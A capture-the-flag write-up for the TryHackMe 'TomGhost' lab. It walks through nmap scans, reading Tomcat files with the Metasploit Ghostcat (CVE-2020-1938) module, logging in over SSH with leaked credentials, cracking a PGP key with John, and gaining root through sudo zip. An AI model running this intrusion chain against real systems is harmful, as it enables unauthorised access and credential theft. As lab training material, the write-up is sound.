Skip to content

TomGhost

IP: 10.10.74.67

Initial nmap scan: 

└─$ nmap 10.10.74.67                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 16:08 EDT
Nmap scan report for 10.10.74.67
Host is up (0.18s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxy
Now I'll start another scan to check all ports with nmap -T4 10.10.74.67 -p-, and while this is running, take a closer look at what we know so far. nmap -sVC -T4 10.10.74.67 -p22,53,8009,8080 -oN nmap-version.txt

Nmap scan report for 10.10.74.67
Host is up (0.17s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to :8080 in a browser, it seems that we have a fresh Apache Tomcat server running 9.0.30 which hasn't been fully set up. Between searchsploit and Google, I came across a vulnerability known as 'Ghostcat', which seems like the right direction being that this room is titled "tomghost".

With my sights focused on CVE-2020-1938, I came across a write-up and exploit on GitHub: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat/blob/main/CVE-2020-1938.py. This server is running a vulnerable version and listening on port 8009, so I decided to take a final look with Metasploit. msfconsole use auxiliary/admin/http/tomcat_ghostcat set RHOSTS 10.10.74.67 With these options, we had the following configuration: 

msf6 auxiliary(admin/http/tomcat_ghostcat) > options

Module options (auxiliary/admin/http/tomcat_ghostcat):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   AJP_PORT  8009              no        The Apache JServ Protocol (AJP) port
   FILENAME  /WEB-INF/web.xml  yes       File name
   RHOSTS    10.10.74.67       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
                                         t/basics/using-metasploit.html
   RPORT     8080              yes       The Apache Tomcat webserver port (TCP)
   SSL       false             yes       SSL
Running check, it confirms that the instance is vulnerable. Finally we'll run and get the contents of /WEB-INF/web.xml, inside which we find the following output: 
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
skyfuck:8730281lkjlkjdqlksalks could be a set of credentials, but now I'm having a hard time finding where to input them.

After some research and poking around in the Tomcat documentation for manger portal locations, it turns out these were just SSH credentials!!

In skyfuck's home directory, we have credential.pgp and tryhackme.asc sitting there. tryhackme.asc contains a PGP private key, which I'm not entirely sure what to do with for now.

Looking around more, we find some hidden files including .bash_history: 

skyfuck@ubuntu:~$ cat .bash_history 
ls
cd ..
ls
cd skyfuck/
ls
exit
cd ..
ls
cd skyfuck/
ls
wget 192.168.32.23/tryhackme.asc
wget 192.168.32.23/credential.pgp
ls
exot
exit

Checking with sudo -l we don't have sudo privileges.

With some research, after copying the .pgp and .asc files to my local machine, I was able to use john to bruteforce the .asc file: gpg2john tryhackme.asc > tocrack john tocrack --wordlist=/usr/share/wordlists/rockyou.txt john tocrack --show The password is alexandru.

Now we're able to use this key to decrypt the .pgp file: gpg --import tryhackme.asc enter alexandru as the password gpg --decrypt credential.pgp enter alexandru as the password again And now we have merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j from the decrypted file.

Authenticating to the server as merlin with our newfound credentials, we find the user flag is in this home directory.

Now looking for privilege escalation possibilities, sudo -l reveals that we can run /usr/bin/zip as root without a password!

This is an immediate red flag to check gtfobins, and sure enough, we're able to get obtain root from there with a copy/paste. https://gtfobins.github.io/gtfobins/zip/#sudo

Lastly, we find and submit the root flag in /root.

This was a fairly straightforward room, but it was great learning a bit about Tomcat and the Ghostcat vulnerability, as well as cracking PGP encryption with John.